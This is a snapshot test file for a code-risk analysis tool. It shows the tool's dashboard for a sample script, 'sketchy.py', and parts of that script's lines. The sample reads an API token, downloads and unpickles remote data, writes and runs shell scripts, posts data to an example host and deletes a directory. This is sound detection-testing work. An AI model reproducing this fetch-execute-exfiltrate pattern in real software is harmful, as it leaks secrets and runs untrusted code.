crates/pyxray-render/tests/snapshots/snapshots__carbon-dashboard.snap
---
source: crates/pyxray-render/tests/snapshots.rs
expression: text
---
╭──────────────────────────────────────────────────────────────────────────────────────────────────╮
│ pyxray  sketchy.py                             21 lines · 16 statements · depth 2 · cyclomatic 2 │
│ reads the environment → makes 2 network calls → DELETES /tmp/stage → evaluates code at runtime … │
│ risk ██████████████████  100  read it first                                    ·▸× ≈»§ ‡ ···· ¶· │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯

╭─ texture ────────────────────────────────────────────────────────────────────────────────────────╮
│ ▂▂▂▂▂▂▂▂▂▂···▂▂▂▂▂▂▂▂▂▂····▂▂▂▂▂▂▂▂▂▂····▂▂▂▂▂▂▂▂▂▂▂▂▂▂····▂▂▂▂▂▄▄▄▄██████▄▄▄▄····▂▂▂▂▂▂▂▂▂▂▂▂▂▂ │
│              !!!!!!        !!!!!▸▸▸▸▸    !!!!!    !!!!!         ▸▸▸▸▸▸▸▸▸!!!!!    !!!!!!!!!!¶¶¶¶ │
│ L1                                                                                          L21  │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯

╭─ flow ───────────────────────────────────────────────╮  ╭─ capabilities ─────────────────────────╮
│    1   ├─ import os, subprocess, shutil, pickle, b…  │  │  ≈ net 2!   § env 2!   » shell 2!      │
│    2   ├─ import requests                            │  │  × delete 1!   ‡ eval 1!   ▸ write 3   │
│    4 ! ├─ TOKEN = os.environ["API_TOKEN"]        env │  │  ¶ print 1                             │
│    5   ├─ STAGING = "/tmp/stage"                     │  ╰────────────────────────────────────────╯
│    7 ! ├─ shutil.rmtree(STAGING, ignore_err…  delete │
│    8   ├─ os.makedirs(STAGING)                 write │  ╭─ what it does ─────────────────────────╮
│   10 ! ├─ resp = requests.get("https://example…  net │  │    4 ! § getenv   …! reads a secret f… │
│   11   ├─ blob = base64.b64decode(resp.content)      │  │    7 ! × rmtree   …! recursively dele… │
│   12 ! ├─ config = pickle.loads(blob)           eval │  │    8   ▸ mkdir    /tmp/stage           │
│   14 ! ├─ for name, script in config["steps"]        │  │   10 ! ≈ GET      …! verify=False — T… │
│   15   │  ├─ with open(f"{STAGING}/{name}.sh…  write │  │   12 ! ‡ unpickle …! unpickling runs … │
│   16   │  │  └─ fh.write(script)               write │  │   15 · ▸ truncate f"{STAGING}/{name}.… │
│   17 ! │  └─ subprocess.run(f"bash {STAGING}…  shell │  │   16 · ▸ write    open(f"{STAGING}/{n… │
│   19 ! ├─ requests.post("https://example.i…  net env │  │   17 ! » run      …! runs an external… │
│   20 ! ├─ subprocess.run(["rm", "-rf", STAGI…  shell │  │   19 ! ≈ POST     …! sends data to a … │
│   21   └─ print("done")                        print │  │   19   § probe    os.uname             │
╰──────────────────────────────────────────────────────╯  │   20 ! » run      …! runs an external… │
                                                          │   21   ¶ print    done                 │
                                                          ╰────────────────────────────────────────╯

                                                          ╭─ imports ──────────────────────────────╮
                                                          │   os                                   │
                                                          │   subprocess                           │
                                                          │   shutil                               │
                                                          │   pickle                               │
                                                          │   base64                               │
                                                          │ • requests                             │
                                                          ╰────────────────────────────────────────╯

                                                          ╭─ values ───────────────────────────────╮
                                                          │    4 TOKEN   ?        os.environ["AP…  │
                                                          │    5 STAGING str      "/tmp/stage"     │
                                                          │   10 resp    response requests.get("…  │
                                                          │   11 blob    ?        base64.b64deco…  │
                                                          │   12 config  ?        pickle.loads(b…  │
                                                          │   14 name    ?        config["steps"]  │
                                                          │   14 script  ?        config["steps"]  │
                                                          │   15 fh      file     open(f"{STAGIN…  │
                                                          ╰────────────────────────────────────────╯

                                                          ╭─ calls ────────────────────────────────╮
                                                          │ subprocess.run                      x2 │
                                                          │ open                                   │
                                                          │ print                                  │
                                                          │ base64.b64decode                       │
                                                          │ <file>.write                           │
                                                          │ os.makedirs                            │
                                                          │ os.uname                               │
                                                          │ pickle.loads                           │
                                                          │ requests.get                           │
                                                          │ requests.post                          │
                                                          ╰────────────────────────────────────────╯

                                                          ╭─ shape ────────────────────────────────╮
                                                          │ 21    16    2     2     0     12       │
                                                          │ lines stmts depth cyclo defs  calls    │
                                                          ╰────────────────────────────────────────╯
